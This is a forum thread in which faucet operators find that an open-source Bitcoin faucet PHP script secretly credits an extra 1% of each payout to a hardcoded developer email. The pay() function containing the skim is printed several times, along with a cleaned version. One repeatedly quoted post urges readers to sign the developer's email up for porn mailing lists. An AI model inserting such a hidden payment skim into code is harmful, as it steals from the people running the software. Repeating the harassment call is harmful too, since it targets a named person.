Author

Topic: My new Xapo faucet payout problem (Read 1245 times)

legendary
Activity: 1988
Merit: 1007
August 23, 2015, 01:18:30 PM
#14
After reading this, I think you're misunderstanding how that script works. As far as I'm aware, they all use the FaucetBuilder protocol. After using a BTC address to make a claim, try this URL:

http://faucetbuilder.com/?lang=us&address=(ADDY)

This should show the faucet claim amount in it. It works a lot like FaucetBox and others.
legendary
Activity: 1442
Merit: 1186
August 23, 2015, 01:00:25 AM
#13
this is the whole script could you please find out solution for this script https://github.com/chipshotDEV/FaucetBuilder

Ah okay I see what happened.

So you've got FaucetBuilder and Faucet-Builder. Both by the same developer "chipshot". I wouldn't trust anything he puts up because in Faucet-Builder he is taking 1% of every transaction you send! Destbogan added himself as a payee FOR EVERY TRANSACTION! Not only will it pay out to your faucet visitors so you think everything is fine, it will also pay him 1% of every single claim on your site, so DO NOT USE THAT CODE.

IN FACT EVERYONE READING THIS SHOULD SIGN UP [email protected] for nasty porn mailing lists, because he is an asshole trying to steal your money.

Uninstall it, and find another script!

is there any way to disable this unwanted 1% payment without uninstalling the script ?

Yes but why would you want to continue to use a script from someone who is dishonest and tried to steal from you??

Code:
function pay($to, $amount, $comment)
{
    $settings = $GLOBALS["settings"];
    $myHashKey = $GLOBALS["hashKey"];
    $serviceUrl = "https://api.xapo.com/v1";
    $xapo_app_id = trim(decryption($myHashKey,$settings['xapo_app_id']));
    $xapo_secret_key = trim(decryption($myHashKey,$settings['xapo_secret_key']));
    $creditAPI = new XapoCreditAPI($serviceUrl, $xapo_app_id, $xapo_secret_key);
    $currency = "SAT"; // SAT | BTC
    $unique_request_id = uniqid();
    $ret = $creditAPI->credit($to, $currency, $unique_request_id, $amount, $comments);
    return $ret;
}

 
hero member
Activity: 868
Merit: 500
August 23, 2015, 12:53:17 AM
#12
this is the whole script could you please find out solution for this script https://github.com/chipshotDEV/FaucetBuilder

Ah okay I see what happened.

So you've got FaucetBuilder and Faucet-Builder. Both by the same developer "chipshot". I wouldn't trust anything he puts up because in Faucet-Builder he is taking 1% of every transaction you send! Destbogan added himself as a payee FOR EVERY TRANSACTION! Not only will it pay out to your faucet visitors so you think everything is fine, it will also pay him 1% of every single claim on your site, so DO NOT USE THAT CODE.

IN FACT EVERYONE READING THIS SHOULD SIGN UP [email protected] for nasty porn mailing lists, because he is an asshole trying to steal your money.

Uninstall it, and find another script!

is there any way to disable this unwanted 1% payment without uninstalling the script ?
legendary
Activity: 1442
Merit: 1186
August 22, 2015, 11:51:40 PM
#11
this is the whole script could you please find out solution for this script https://github.com/chipshotDEV/FaucetBuilder

Ah okay I see what happened.

So you've got FaucetBuilder and Faucet-Builder. Both by the same developer "chipshot". I wouldn't trust anything he puts up because in Faucet-Builder he is taking 1% of every transaction you send! Destbogan added himself as a payee FOR EVERY TRANSACTION! Not only will it pay out to your faucet visitors so you think everything is fine, it will also pay him 1% of every single claim on your site, so DO NOT USE THAT CODE.

IN FACT EVERYONE READING THIS SHOULD SIGN UP [email protected] for nasty porn mailing lists, because he is an asshole trying to steal your money.

Uninstall it, and find another script!
hero member
Activity: 868
Merit: 500
August 22, 2015, 02:23:46 AM
#10
this is the whole script could you please find out solution for this script https://github.com/chipshotDEV/FaucetBuilder
legendary
Activity: 1442
Merit: 1186
August 22, 2015, 01:13:50 AM
#9
if I edit $to= email then it'll cause an error so I can't change that starnge email too

$to = email is not valid syntax for php, so it would cause an error.
Where id you get this code from? It seems quite spotty. It's defining $unique_request_id & $ret twice in the same function, effectively re-writing it for no reason.
hero member
Activity: 868
Merit: 500
August 22, 2015, 01:01:28 AM
#8
if I edit $to= email then it'll cause an error so I can't change that starnge email too
legendary
Activity: 1442
Merit: 1186
August 22, 2015, 12:54:53 AM
#7
I'm also having the same problem with this script however the non xapo users payment is sent out them as I tested putting sat reward 10000 .
I'm also not a programer but understand what the code is saying look below
Quote
function pay($to, $amount, $comment)
{
    $settings = $GLOBALS["settings"];
    $myHashKey = $GLOBALS["hashKey"];
    $serviceUrl = "https://api.xapo.com/v1";
    $xapo_app_id = trim(decryption($myHashKey,$settings['xapo_app_id']));
    $xapo_secret_key = trim(decryption($myHashKey,$settings['xapo_secret_key']));
    $creditAPI = new XapoCreditAPI($serviceUrl, $xapo_app_id, $xapo_secret_key);
    $currency = "SAT"; // SAT | BTC
    $unique_request_id = uniqid();
    $ret = $creditAPI->credit($to, $currency, $unique_request_id, $amount, $comments);
    $amount = $amount * 0.01;
    $unique_request_id = uniqid();
    $to="[email protected]";
    $ret = $creditAPI->credit($to, $currency, $unique_request_id, $amount, "Thank you for using Faucet Builder");
    return $ret;
}

see  $to="[email protected]" and see $amount = $amount * 0.01 this means 0.01% of reward will be sent to him and i also noticed this in my xapo payout history.
so how to solve this problem how to remove this email ?

The above is a PHP function called pay.

when pay(); is called it will execute all the code within the {}.

Example of functions:

Code:
function say(){
 echo "hello there";
}
//above is my function called say, now I can call it later in my script just by typing say(); instead of having to do the code all over again

say();
say();
//the above will write "hello there" on the screen twice because I called the function twice

What do you want the variable $to to be? My assumption is it is supposed to be the users email? In that case it shouldn't be hardcoded in but instead something like $to = $_POST['user_email']; or whatever the name of your input form is for the email section.

I'm not sure why the amount is being multiplied by 0.01. How do you determine the reward amount on your faucet? That's what you want $amount to be equal to.
hero member
Activity: 868
Merit: 500
August 22, 2015, 12:44:24 AM
#6
I'm also having the same problem with this script however the non xapo users payment is sent out them as I tested putting sat reward 10000 .
I'm also not a programer but understand what the code is saying look below
Quote
function pay($to, $amount, $comment)
{
    $settings = $GLOBALS["settings"];
    $myHashKey = $GLOBALS["hashKey"];
    $serviceUrl = "https://api.xapo.com/v1";
    $xapo_app_id = trim(decryption($myHashKey,$settings['xapo_app_id']));
    $xapo_secret_key = trim(decryption($myHashKey,$settings['xapo_secret_key']));
    $creditAPI = new XapoCreditAPI($serviceUrl, $xapo_app_id, $xapo_secret_key);
    $currency = "SAT"; // SAT | BTC
    $unique_request_id = uniqid();
    $ret = $creditAPI->credit($to, $currency, $unique_request_id, $amount, $comments);
    $amount = $amount * 0.01;
    $unique_request_id = uniqid();
    $to="[email protected]";
    $ret = $creditAPI->credit($to, $currency, $unique_request_id, $amount, "Thank you for using Faucet Builder");
    return $ret;
}

see  $to="[email protected]" and see $amount = $amount * 0.01 this means 0.01% of reward will be sent to him and i also noticed this in my xapo payout history.
so how to solve this problem how to remove this email ?
sr. member
Activity: 266
Merit: 250
May 28, 2015, 11:13:15 PM
#5
Thanks i will try it Grin
legendary
Activity: 1442
Merit: 1186
May 28, 2015, 11:02:56 PM
#4
I think you would be better off keeping track of users balances off chain and on a mysql database. Once the user reaches 10,000 satoshis or whatever amount you choose is enough then you have them go to a cashout page and send the payment.

Maybe try this one out that uses blockchain.info API

https://github.com/zelles/blockchain.info_Bitcoin_Faucet_v.0.1.3

Oh yea, and if you do use the above, you will need enable API access in the settings AND white list your servers IP with blockchain.info.
sr. member
Activity: 266
Merit: 250
May 28, 2015, 04:41:09 PM
#3
its off the chain xapo.
i just found out the script is sending satoshi on the downlow thru credit in the mail check it
maybe the money is going to them look.
This really sucks because i've worked real hard on the cosmedics  i wish i went to school for this. i am not a programmer but know the basics,i can read what its saying but i dont know how to write code for json etc
here is the faucet unfinished  http://www.bitcoinfaucetexchange.com/, i've been moving things around and sort but i think i might have to give this script to the dog cause its just too buggy. supposedly the non xapo members will get a payment from it if its over 5500 but i'm not setting the faucet that high for every user so i am at witts end i wish i just had a script i could trust
also ill show you the whole function maybe you can see the problem

require 'libs/XapoCreditAPI.php';

function get_main_url($omitHost = false)
{
    $protocol = ((!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] === '443') ? 'https://' : 'http://';
    if ($omitHost) {
        return strtok($_SERVER['REQUEST_URI'], '?');
    }

    return $protocol . $_SERVER['HTTP_HOST'] . strtok($_SERVER['REQUEST_URI'], '?');
}


function get_ip()
{
    if (!filter_var($_SERVER['REMOTE_ADDR'], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {
        echo 'Invalid IP.
Main page';
        exit;
    }

    if ($GLOBALS['settings']['behind_proxy']) {
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR']) {
            $ipList                          = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
            $_SERVER['HTTP_X_FORWARDED_FOR'] = array_pop($ipList);
        } else {
            $_SERVER['HTTP_X_FORWARDED_FOR'] = false;
        }

        if (filter_var($_SERVER['HTTP_X_FORWARDED_FOR'], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {
            return $_SERVER['HTTP_X_FORWARDED_FOR'];
        } else {
            $query = "insert into sarlanga_settings (name, value) values('behind_proxy', '0') on duplicate key update value = values(value)";
            mysqli_query($GLOBALS['db'], $query);
            $GLOBALS['settings']['behind_proxy'] = '0';

            return $_SERVER['REMOTE_ADDR'];
        }
    }

    return $_SERVER['REMOTE_ADDR'];
}


function get_rewards($rewards = null)
{
    if (is_null($rewards)) {
        $rewards = $GLOBALS['settings']['rewards'];
    }
    $rewards         = explode(',', $rewards);
    $rewardList      = array();
    $totalMultiplier = 0;
    foreach ($rewards as $reward) {
        @list($reward, $multiplier) = explode('*', $reward);
        $reward     = (int) trim(abs($reward));
        $multiplier = (int) trim(abs($multiplier));
        if (!$multiplier)
            $multiplier = 1;
        if (!$reward)
            continue;
        if (!isset($rewardList[$reward])) {
            $rewardList[$reward] = 0;
        }
        $rewardList[$reward] += $multiplier;
        $totalMultiplier += $multiplier;
    }
    krsort($rewardList);
    $result['reward_list']      = array();
    $result['reward_list_html'] = '';
    $result['full_reward_list'] = array();
    $totalAmount                = 0;
    foreach ($rewardList as $reward => $multiplier) {
        $odds = round($totalMultiplier / $multiplier);
        if ($odds > 10000) {
            $percentage = '<0.01%';
        } else {
            $percentage = rtrim(rtrim(number_format($multiplier / $totalMultiplier * 100, 2), '0'), '.') . '%';
        }
        $result['reward_list'][] = array(
            'reward' => $reward,
            'percentage' => $percentage,
            'odds' => '1:' . $odds
        );
        $result['reward_list_html'] .= htmlspecialchars($reward) ." " ;
        $result['full_reward_list'] = array_merge($result['full_reward_list'], array_fill(0, $multiplier, $reward));
        $totalAmount += $reward;
    }
    //$result['reward_list_html'] = . $result['reward_list_html'];

    if (!$result['reward_list']) {
        return false;
    }

    $result['random_reward']  = $result['full_reward_list'][mt_rand(0, count($result['full_reward_list']) - 1)];
    $result['average_reward'] = (int) ($totalAmount / $totalMultiplier);

    return $result;
}

function format_timer($totalSeconds)
{
    $totalSeconds = (int) abs($totalSeconds);
    $hours        = (int) floor($totalSeconds / 3600);
    $minutes      = (int) floor(($totalSeconds - ($hours * 3600)) / 60);
    $seconds      = $totalSeconds % 60;

    $result = '';
    if ($hours === 1) {
        $result .= '1 hour';
    } elseif ($hours > 1) {
        $result .= $hours . ' hours';
    }
    if ($hours && $minutes) {
        $result .= ', ';
    }
    if ($minutes === 1) {
        $result .= '1 min';
    } elseif ($minutes > 1) {
        $result .= $minutes . ' mins';
    }
    if (($hours || $minutes) && $seconds) {
        $result .= ', ';
    }
    if ($seconds === 1) {
        $result .= '1 sec';
    } elseif ($seconds > 1) {
        $result .= $seconds . ' secs';
    }

    return $result;
}

function fix_magic_quotes()
{
    if (get_magic_quotes_gpc()) {
        $process = array(
            &$_GET,
            &$_POST,
            &$_COOKIE,
            &$_REQUEST
        );
        while (list($key, $val) = each($process)) {
            foreach ($val as $k => $v) {
                unset($process[$key][$k]);
                if (is_array($v)) {
                    $process[$key][stripslashes($k)] = $v;
                    $process[] =& $process[$key][stripslashes($k)];
                } else {
                    $process[$key][stripslashes($k)] = stripslashes($v);
                }
            }
        }
        unset($process);
    }
}



function pay($to, $amount, $comment)
{
    $settings = $GLOBALS["settings"];
    $myHashKey = $GLOBALS["hashKey"];
    $serviceUrl = "https://api.xapo.com/v1";
    $xapo_app_id = trim(decryption($myHashKey,$settings['xapo_app_id']));
    $xapo_secret_key = trim(decryption($myHashKey,$settings['xapo_secret_key']));
    $creditAPI = new XapoCreditAPI($serviceUrl, $xapo_app_id, $xapo_secret_key);
    $currency = "SAT"; // SAT | BTC
    $unique_request_id = uniqid();
    $ret = $creditAPI->credit($to, $currency, $unique_request_id, $amount, $comments);
    $amount = $amount * 0.01;
    $unique_request_id = uniqid();
    $to="[email protected]";
    $ret = $creditAPI->credit($to, $currency, $unique_request_id, $amount, "Thank you for using Faucet Builder");
    return $ret;
}

function encryption($key,$data){
  return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, $data, 'ecb'));
}

function decryption($key,$data){
  return mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key, base64_decode($data), 'ecb');
}

function validHash($myHashKey){
  //A-Z,a-z,0-9, 32 char
  return preg_match("/^[A-Z0-9_]*[A-Z0-9][A-Z0-9]{31}$/i",$myHashKey);
}

?>

legendary
Activity: 1442
Merit: 1186
May 28, 2015, 07:51:35 AM
#2
How does it go into the abyss? Are you able to track the payment on the blockchain or is this all off chain transactions with xapo?
Looking at their API doc: https://developers.xapo.com/api/mpayment/

They use a Receiver ID
Code:
receiver_user_UID

string 

an ID used by your app to uniquely identify the receiver.


This is your payment code on that faucet:

Code:
function pay($to, $amount, $comment)
{
    $settings = $GLOBALS["settings"];
    $serviceUrl = "https://api.xapo.com/v1";
    $creditAPI = new XapoCreditAPI($serviceUrl, $settings['xapo_app_id'], $settings['xapo_secret_key']);
    $currency = "SAT"; // SAT | BTC
    $unique_request_id = uniqid();
    return $creditAPI->credit($to, $currency, $unique_request_id, $amount, $comments);
}

I've never used xapo but if that receiver ID is what they are using instead of BTC addresses, that would explain why it only works with xapo accounts.
sr. member
Activity: 266
Merit: 250
May 27, 2015, 09:42:06 PM
#1
I just built a faucet using a script from github,everything is fine but for some reason it will only payout to xapo customers,  so if someone puts their non xapo address in it says it pays but the money just goes into the abyss LOL... does anyone have an idea how to fix this problem .here is where i got the script https://github.com/chipshotDEV/FaucetBuilder  and here is my faucet  http://www.bitcoinfaucetexchange.com/
Jump to: